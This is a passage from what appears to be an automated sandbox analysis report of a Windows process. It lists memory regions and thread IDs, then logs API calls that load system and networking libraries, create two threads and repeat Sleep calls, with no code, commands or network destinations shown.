= 0x2580000 end_va = 0x258afff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002580000" filename = "" Region: id = 2145 start_va = 0x2590000 end_va = 0x259afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002590000" filename = "" Region: id = 2146 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2147 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2148 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2151 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2152 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2153 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2154 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2155 start_va = 0x25a0000 end_va = 0x25a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2156 start_va = 0x25b0000 end_va = 0x26a9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2157 start_va = 0x25a0000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2158 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2159 start_va = 0x25a0000 end_va = 0x25adfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025a0000" filename = "" Region: id = 2160 start_va = 0x25a0000 end_va = 0x25a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 2161 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2162 start_va = 0x25c0000 end_va = 0x25c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025c0000" filename = "" Region: id = 2163 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2164 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2165 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2166 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2167 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2168 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2169 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2170 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2171 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2172 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2173 start_va = 0x25d0000 end_va = 0x26c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2174 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2175 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2176 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2177 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2178 start_va = 0x3c00000 end_va = 0x3c7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003c00000" filename = "" Region: id = 2179 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 2180 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2181 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2182 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2183 start_va = 0x25b0000 end_va = 0x25b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2184 start_va = 0x25d0000 end_va = 0x26c9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2185 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2186 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2187 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2188 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2189 start_va = 0x25b0000 end_va = 0x25bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2190 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2191 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2192 start_va = 0x25b0000 end_va = 0x25bdfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2193 start_va = 0x2590000 end_va = 0x2592fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 2194 start_va = 0x25b0000 end_va = 0x25b5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025b0000" filename = "" Region: id = 2195 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2196 start_va = 0x25d0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 2197 start_va = 0x25e0000 end_va = 0x25edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 2198 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2199 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2201 start_va = 0x25d0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 2202 start_va = 0x25e0000 end_va = 0x25edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 2203 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2204 start_va = 0x25d0000 end_va = 0x25d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 2205 start_va = 0x25e0000 end_va = 0x26d9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 2206 start_va = 0x25d0000 end_va = 0x25dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 2207 start_va = 0x25e0000 end_va = 0x25edfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025e0000" filename = "" Region: id = 2208 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Region: id = 2209 start_va = 0x25d0000 end_va = 0x25ddfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000025d0000" filename = "" Thread: id = 3 os_tid = 0xd4c Thread: id = 4 os_tid = 0xcbc Thread: id = 5 os_tid = 0xcb8 Thread: id = 6 os_tid = 0xc5c Thread: id = 7 os_tid = 0x9ec Thread: id = 8 os_tid = 0x908 Thread: id = 9 os_tid = 0x118 Thread: id = 10 os_tid = 0x6e4 Thread: id = 11 os_tid = 0x324 Thread: id = 12 os_tid = 0x338 Thread: id = 13 os_tid = 0x7b4 Thread: id = 14 os_tid = 0x7e8 Thread: id = 15 os_tid = 0x5b0 Thread: id = 16 os_tid = 0x320 Thread: id = 17 os_tid = 0x594 Thread: id = 18 os_tid = 0x588 Thread: id = 19 os_tid = 0x4b8 Thread: id = 20 os_tid = 0x4b4 Thread: id = 21 os_tid = 0x434 Thread: id = 22 os_tid = 0x7e4 Thread: id = 23 os_tid = 0x5dc Thread: id = 24 os_tid = 0x544 Thread: id = 25 os_tid = 0x4e4 Thread: id = 26 os_tid = 0x4cc Thread: id = 27 os_tid = 0x4c8 Thread: id = 28 os_tid = 0x4c4 Thread: id = 29 os_tid = 0x4a8 Thread: id = 30 os_tid = 0x4a4 Thread: id = 31 os_tid = 0x4a0 Thread: id = 32 os_tid = 0x404 Thread: id = 33 os_tid = 0x288 Thread: id = 34 os_tid = 0x168 Thread: id = 35 os_tid = 0x148 Thread: id = 36 os_tid = 0x180 Thread: id = 37 os_tid = 0x394 Thread: id = 38 os_tid = 0x13c Thread: id = 39 os_tid = 0xe34 [0068.121] LoadLibraryA (lpLibFileName="NTDLL") returned 0x77800000 [0068.123] GetProcAddress (hModule=0x77800000, lpProcName="RtlExitUserThread") returned 0x77846930 [0068.124] RtlCreateHeap (Flags=0x1002, HeapBase=0x0, ReserveSize=0x0, CommitSize=0x0, Lock=0x0, Parameters=0x0) returned 0x7f50000 [0068.571] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10) returned 0x7f512f0 [0068.571] LoadLibraryA (lpLibFileName="user32") returned 0x775e0000 [0068.572] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x10 [0068.583] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0068.583] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x12) returned 0x7f512f0 [0068.583] LoadLibraryA (lpLibFileName="advapi32") returned 0x7fefefb0000 [0068.584] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x12 [0068.584] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0068.584] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10) returned 0x7f512f0 [0068.584] LoadLibraryA (lpLibFileName="urlmon") returned 0x7fefdb20000 [0068.585] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x10 [0068.585] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0068.585] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0xf) returned 0x7f512f0 [0068.585] LoadLibraryA (lpLibFileName="ole32") returned 0x7feff2f0000 [0068.586] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0xf [0068.586] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0068.586] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x11) returned 0x7f512f0 [0068.586] LoadLibraryA (lpLibFileName="winhttp") returned 0x7fef5a80000 [0069.057] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x11 [0069.057] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0069.057] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10) returned 0x7f512f0 [0069.057] LoadLibraryA (lpLibFileName="ws2_32") returned 0x7feffac0000 [0069.058] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x10 [0069.058] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0069.058] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x10) returned 0x7f512f0 [0069.058] LoadLibraryA (lpLibFileName="dnsapi") returned 0x7fefce60000 [0069.069] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x10 [0069.069] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0069.069] RtlAllocateHeap (HeapHandle=0x7f50000, Flags=0x8, Size=0x11) returned 0x7f512f0 [0069.069] LoadLibraryA (lpLibFileName="shell32") returned 0x7fefdee0000 [0069.069] RtlSizeHeap (HeapHandle=0x7f50000, Flags=0x0, MemoryPointer=0x7f512f0) returned 0x11 [0069.069] RtlFreeHeap (HeapHandle=0x7f50000, Flags=0x0, BaseAddress=0x7f512f0) returned 1 [0069.070] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3933ca4, lpParameter=0x3900000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1584 [0069.072] CloseHandle (hObject=0x1584) returned 1 [0069.072] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x3933d80, lpParameter=0x3900000, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1584 [0069.073] CloseHandle (hObject=0x1584) returned 1 [0069.073] Sleep (dwMilliseconds=0xa) [0069.084] Sleep (dwMilliseconds=0xa) [0069.096] Sleep (dwMilliseconds=0xa) [0069.110] Sleep (dwMilliseconds=0xa) [0069.126] Sleep (dwMilliseconds=0xa) [0069.142] Sleep (dwMilliseconds=0xa) [0069.157] Sleep (dwMilliseconds=0xa) [0069.173] Sleep (dwMilliseconds=0xa) [0069.189] Sleep (dwMilliseconds=0xa) [0069.204] Sleep (dwMilliseconds=0xa) [0069.219] Sleep (dwMilliseconds=0xa) [0069.235] Sleep (dwMilliseconds=0xa) [0069.250] Sleep (dwMilliseconds=0xa) [0069.267] Sleep (dwMilliseconds=0xa) [0069.281] Sleep (dwMilliseconds=0xa) [0069.297] Sleep (dwMilliseconds=0xa) [0069.313] Sleep (dwMilliseconds=0xa) [0069.329] Sleep (dwMilliseconds=0xa) [0069.344] Sleep (dwMilliseconds=0xa) [0069.360] Sleep (dwMilliseconds=0xa) [0069.376] Sleep (dwMilliseconds=0xa) [0069.391] Sleep (dwMilliseconds=0xa) [0069.407] Sleep (dwMilliseconds=0xa) [0069.422] Sleep (dwMilliseconds=0xa) [0069.438] Sleep (dwMilliseconds=0xa) [0069.453] Sleep (dwMilliseconds=0xa) [0069.470] Sleep (dwMilliseconds=0xa) [0069.485] Sleep (dwMilliseconds=0xa) [0069.500] Sleep (dwMilliseconds=0xa) [0069.516] Sleep (dwMilliseconds=0xa) [0069.532] Sleep (dwMilliseconds=0xa) [0069.547] Sleep (dwMilliseconds=0xa) [0069.562] Sleep (dwMilliseconds=0xa) [0069.579] Sleep (dwMilliseconds=0xa) [0069.593] Sleep (dwMilliseconds=0xa) [0069.609] Sleep (dwMilliseconds=0xa) [0069.625] Sleep (dwMilliseconds=0xa) [0069.641] Sleep (dwMilliseconds=0xa) [0069.676] Sleep (dwMilliseconds=0xa) [0069.687] Sleep (dwMilliseconds=0xa) [0069.742] Sleep (dwMilliseconds=0xa) [0069.782] Sleep (dwMilliseconds=0xa) [0069.817] Sleep (dwMilliseconds=0xa) [0069.850] Sleep (dwMilliseconds=0xa) [0069.862] Sleep (dwMilliseconds=0xa) [0069.877] Sleep (dwMilliseconds=0xa) [0069.890] Sleep (dwMilliseconds=0xa) [0069.905] Sleep (dwMilliseconds=0xa) [0069.922] Sleep (dwMilliseconds=0xa) [0069.970] Sleep (dwMilliseconds=0xa) [0069.996] Sleep (dwMilliseconds=0xa) [0070.000] Sleep (dwMilliseconds=0xa) [0070.015] Sleep (dwMilliseconds=0xa) [0070.030] Sleep (dwMilliseconds=0xa) [0070.046] Sleep (dwMilliseconds=0xa) [0070.062] Sleep (dwMilliseconds=0xa) [0070.078] Sleep (dwMilliseconds=0xa) [0070.104] Sleep (dwMilliseconds=0xa) [0070.153] Sleep (dwMilliseconds=0xa) [0070.190] Sleep (dwMilliseconds=0xa) [0070.202] Sleep (dwMilliseconds=0xa) [0070.218] Sleep (dwMilliseconds=0xa) [0070.241] Sleep (dwMilliseconds=0xa) [0070.249] Sleep (dwMilliseconds=0xa) [0070.264] Sleep (dwMilliseconds=0xa) [0070.281] Sleep (dwMilliseconds=0xa) [0070.296] Sleep (dwMilliseconds=0xa) [0070.343] Sleep (dwMilliseconds=0xa) [0070.370] Sleep (dwMilliseconds=0xa) [0070.374] Sleep (dwMilliseconds=0xa) [0070.389] Sleep (dwMilliseconds=0xa) [0070.405] Sleep (dwMilliseconds=0xa) [0070.421] Sleep (dwMilliseconds=0xa) [0070.436] Sleep (dwMilliseconds=0xa) [0070.454] Sleep (dwMilliseconds=0xa) [0070.468] Sleep (dwMilliseconds=0xa) [0070.518] Sleep (dwMilliseconds=0xa) [0070.540] Sleep (dwMilliseconds=0xa) [0070.546] Sleep (dwMilliseconds=0xa) [0070.562] Sleep (dwMilliseconds=0xa) [0070.601] Sleep (dwMilliseconds=0xa) [0070.608] Sleep (dwMilliseconds=0xa) [0070.637] Sleep (dwMilliseconds=0xa) [0070.639] Sleep (dwMilliseconds=0xa) [0070.686] Sleep (dwMilliseconds=0xa) [0070.715] Sleep (dwMilliseconds=0xa) [0070.717] Sleep (dwMilliseconds=0xa) [0070.733] Sleep (dwMilliseconds=0xa) [0070.748] Sleep (dwMilliseconds=0xa) [0070.765] Sleep (dwMilliseconds=0xa) [0070.779] Sleep (dwMilliseconds=0xa) [0070.795] Sleep (dwMilliseconds=0xa) [0070.811] Sleep (dwMilliseconds=0xa) [0070.873] Sleep (dwMilliseconds=0xa) [0070.901] Sleep (dwMilliseconds=0xa) [0070.907] Sleep (dwMilliseconds=0xa) [0070.927] Sleep (dwMilliseconds=0xa) [0070.935] Sleep (dwMilliseconds=0xa) [0070.952] Sleep (dwMilliseconds=0xa) [0070.967] Sleep (dwMilliseconds=0xa) [0070.988] Sleep (dwMilliseconds=0xa) [0071.000] Sleep (dwMilliseconds=0xa) [0071.048] Sleep (dwMilliseconds=0xa) [0071.072] Sleep (dwMilliseconds=0xa) [0071.076] Sleep (dwMilliseconds=0xa) [0071.091] Sleep (dwMilliseconds=0xa) [0071.114] Sleep (dwMilliseconds=0xa) [0071.123] Sleep (dwMilliseconds=0xa) [0071.138] Sleep (dwMilliseconds=0xa) [0071.153] Sleep (dwMilliseconds=0xa) [0071.175] Sleep (dwMilliseconds=0xa) [0071.217] Sleep (dwMilliseconds=0xa) [0071.242] Sleep (dwMilliseconds=0xa) [0071.250] Sleep (dwMilliseconds=0xa) [0071.263] Sleep (dwMilliseconds=0xa) [0071.281] Sleep (dwMilliseconds=0xa) [0071.294] Sleep (dwMilliseconds=0xa) [0071.310] Sleep (dwMilliseconds=0xa) [0071.328] Sleep (dwMilliseconds=0xa) [0071.388] Sleep (dwMilliseconds=0xa) [0071.403] Sleep (dwMilliseconds=0xa) [0071.435] Sleep (dwMilliseconds=0xa) [0071.450] Sleep (dwMilliseconds=0xa) [0071.466] Sleep (dwMilliseconds=0xa) [0071.482] Sleep (dwMilliseconds=0xa) [0071.497] Sleep (dwMilliseconds=0xa) [0071.544] Sleep (dwMilliseconds=0xa) [0071.559] Sleep (dwMilliseconds=0xa) [0071.575] Sleep (dwMilliseconds=0xa) [0071.590] Sleep (dwMilliseconds=0xa) [0071.606] Sleep (dwMilliseconds=0xa) [0071.624] Sleep (dwMilliseconds=0xa) [0071.640] Sleep (dwMilliseconds=0xa) [0071.676] Sleep (dwMilliseconds=0xa) [0071.715] Sleep (dwMilliseconds=0xa) [0071.737] Sleep (dwMilliseconds=0xa) [0071.749] Sleep (dwMilliseconds=0xa) [0071.765] Sleep (dwMilliseconds=0xa) [0071.778] Sleep (dwMilliseconds=0xa) [0071.793] Sleep (dwMilliseconds=0xa) [0071.809] Sleep (dwMilliseconds=0xa) [0071.824] Sleep (dwMilliseconds=0xa) [0071.870] Sleep (dwMilliseconds=0xa) [0071.919] Sleep (dwMilliseconds=0xa) [0071.933] Sleep (dwMilliseconds=0xa) [0071.949] Sleep (dwMilliseconds=0xa) [0071.965] Sleep (dwMilliseconds=0xa) [0071.981] Sleep (dwMilliseconds=0xa) [0071.998] Sleep (dwMilliseconds=0xa) [0072.014] Sleep (dwMilliseconds=0xa) [0072.029] Sleep (dwMilliseconds=0xa) [0072.074] Sleep (dwMilliseconds=0xa) [0072.098] Sleep (dwMilliseconds=0xa) [0072.117] Sleep (dwMilliseconds=0xa) [0072.121] Sleep (dwMilliseconds=0xa) [0072.137] Sleep (dwMilliseconds=0xa) [0072.152] Sleep (dwMilliseconds=0xa) [0072.168] Sleep (dwMilliseconds=0xa) [0072.184] Sleep (dwMilliseconds=0xa) [0072.200] Sleep (dwMilliseconds=0xa) [0072.246] Sleep (dwMilliseconds=0xa) [0072.281] Sleep (dwMilliseconds=0xa) [0072.292] Sleep (dwMilliseconds=0xa) [0072.312] Sleep (dwMilliseconds=0xa) [0072.331] Sleep (dwMilliseconds=0xa) [0072.343] Sleep (dwMilliseconds=0xa) [0072.355] Sleep (dwMilliseconds=0xa) [0072.370] Sleep (dwMilliseconds=0xa) [0072.386] Sleep (dwMilliseconds=0xa) [0072.433] Sleep (dwMilliseconds=0xa) [0072.455] Sleep (dwMilliseconds=0xa) [0072.464] Sleep (dwMilliseconds=0xa) [0072.480] Sleep (dwMilliseconds=0xa) [0072.495] Sleep (dwMilliseconds=0xa) [0072.511] Sleep (dwMilliseconds=0xa) [0072.527] Sleep (dwMilliseconds=0xa) [0072.558] Sleep (dwMilliseconds=0xa) [0072.605] Sleep (dwMilliseconds=0xa) [0072.628] Sleep (dwMilliseconds=0xa) [0072.637] Sleep (dwMilliseconds=0xa) [0072.651] Sleep (dwMilliseconds=0xa) [0072.667] Sleep (dwMilliseconds=0xa) [0072.682] Sleep (dwMilliseconds=0xa) [0072.698] Sleep (dwMilliseconds=0xa) [0072.715] Sleep (dwMilliseconds=0xa) [0072.732] Sleep (dwMilliseconds=0xa) [0072.776] Sleep (dwMilliseconds=0xa) [0072.791] Sleep (dwMilliseconds=0xa) [0072.807] Sleep (dwMilliseconds=0xa) [0072.824] Sleep (dwMilliseconds=0xa) [0072.868] Sleep (dwMilliseconds=0xa) [0072.869] Sleep (dwMilliseconds=0xa) [0072.885] Sleep (dwMilliseconds=0xa) [0072.933] Sleep (dwMilliseconds=0xa) [0072.947] Sleep (dwMilliseconds=0xa) [0072.963] Sleep (dwMilliseconds=0xa) [0072.979] Sleep (dwMilliseconds=0xa) [0072.994] Sleep (dwMilliseconds=0xa) [0073.010] Sleep (dwMilliseconds=0xa) [0073.025] Sleep (dwMilliseconds=0xa) [0073.043] Sleep (dwMilliseconds=0xa) [0073.088] Sleep (dwMilliseconds=0xa) [0073.107] Sleep (dwMilliseconds=0xa) [0073.121] Sleep (dwMilliseconds=0xa) [0073.135] Sleep (dwMilliseconds=0xa) [0073.151] Sleep (dwMilliseconds=0xa) [0073.167] Sleep (dwMilliseconds=0xa) [0073.189] Sleep (dwMilliseconds=0xa) [0073.197] Sleep (dwMilliseconds=0xa) [0073.213] Sleep (dwMilliseconds=0xa) [0073.260] Sleep (dwMilliseconds=0xa) [0073.282] Sleep (dwMilliseconds=0xa) [0073.291] Sleep (dwMilliseconds=0xa) [0073.307] Sleep (dwMilliseconds=0xa) [0073.327] Sleep (dwMilliseconds=0xa) [0073.337] Sleep (dwMilliseconds=0xa) [0073.353] Sleep (dwMilliseconds=0xa) [0073.371] Sleep (dwMilliseconds=0xa) [0073.386] Sleep (dwMilliseconds=0xa) [0073.431] Sleep (dwMilliseconds=0xa) [0073.447] Sleep (dwMilliseconds=0xa) [0073.463] Sleep (dwMilliseconds=0xa) [0073.479] Sleep (dwMilliseconds=0xa) [0073.494] Sleep (dwMilliseconds=0xa) [0073.509] Sleep (dwMilliseconds=0xa) [0073.525] Sleep (dwMilliseconds=0xa) [0073.541] Sleep (dwMilliseconds=0xa) [0073.588] Sleep (dwMilliseconds=0xa) [0073.613] Sleep (dwMilliseconds=0xa) [0073.618] Sleep (dwMilliseconds=0xa) [0073.634] Sleep (dwMilliseconds=0xa) [0073.665] Sleep (dwMilliseconds=0xa) [0073.681] Sleep (dwMilliseconds=0xa) [0073.698] Sleep (dwMilliseconds=0xa) [0073.714] Sleep (dwMilliseconds=0xa) [0073.759] Sleep (dwMilliseconds=0xa) [0073.782] Sleep (dwMilliseconds=0xa) [0073.790] Sleep (dwMilliseconds=0xa) [0073.806] Sleep (dwMilliseconds=0xa) [0073.866] Sleep (dwMilliseconds=0xa) [0073.869] Sleep (dwMilliseconds=0xa) [0073.884] Sleep (dwMilliseconds=0xa) [0073.933] Sleep (dwMilliseconds=0xa) [0073.951] Sleep (dwMilliseconds=0xa) [0073.961] Sleep (dwMilliseconds=0xa) [0073.977] Sleep (dwMilliseconds=0xa) [0073.993] Sleep (dwMilliseconds=0xa) [0074.008] Sleep (dwMilliseconds=0xa) [0074.025] Sleep (dwMilliseconds=0xa) [0074.040] Sleep (dwMilliseconds=0xa) [0074.055] Sleep (dwMilliseconds=0xa) [0074.102] Sleep (dwMilliseconds=0xa) [0074.140] Sleep (dwMilliseconds=0xa) [0074.149] Sleep (dwMilliseconds=0xa) [0074.165] Sleep (dwMilliseconds=0xa) [0074.180] Sleep (dwMilliseconds=0xa) [0074.196] Sleep (dwMilliseconds=0xa) [0074.212] Sleep (dwMilliseconds=0xa) [0074.227] Sleep (dwMilliseconds=0xa) [0074.244] Sleep (dwMilliseconds=0xa) [0074.289] Sleep (dwMilliseconds=0xa) [0074.309] Sleep (dwMilliseconds=0xa) [0074.321] Sleep (dwMilliseconds=0xa) [0074.336] Sleep (dwMilliseconds=0xa) [0074.353] Sleep (dwMilliseconds=0xa) [0074.367] Sleep (dwMilliseconds=0xa) [0074.383] Sleep (dwMilliseconds=0xa) [0074.398] Sleep (dwMilliseconds=0xa) [0074.414] Sleep (dwMilliseconds=0xa) [0074.449] Sleep (dwMilliseconds=0xa) [0074.473] Sleep (dwMilliseconds=0xa) [0074.476] Sleep (dwMilliseconds=0xa) [0074.492] Sleep (dwMilliseconds=0xa) [0074.508] Sleep (dwMilliseconds=0xa) [0074.523] Sleep (dwMilliseconds=0xa) [0074.539] Sleep (dwMilliseconds=0xa) [0074.555] Sleep (dwMilliseconds=0xa) [0074.570] Sleep (dwMilliseconds=0xa) [0074.617] Sleep (dwMilliseconds=0xa) [0074.641] Sleep (dwMilliseconds=0xa) [0074.648] Sleep (dwMilliseconds=0xa) [0074.664] Sleep (dwMilliseconds=0xa) [0074.679] Sleep (dwMilliseconds=0xa) [0074.695] Sleep (dwMilliseconds=0xa) [0074.712] Sleep (dwMilliseconds=0xa) [0074.726] Sleep (dwMilliseconds=0xa) [0074.742] Sleep (dwMilliseconds=0xa) [0074.789] Sleep (dwMilliseconds=0xa) [0074.808] Sleep (dwMilliseconds=0xa) [0074.821] Sleep (dwMilliseconds=0xa) [0074.847] Sleep (dwMilliseconds=0xa) [0074.852] Sleep (dwMilliseconds=0xa) [0074.866] Sleep 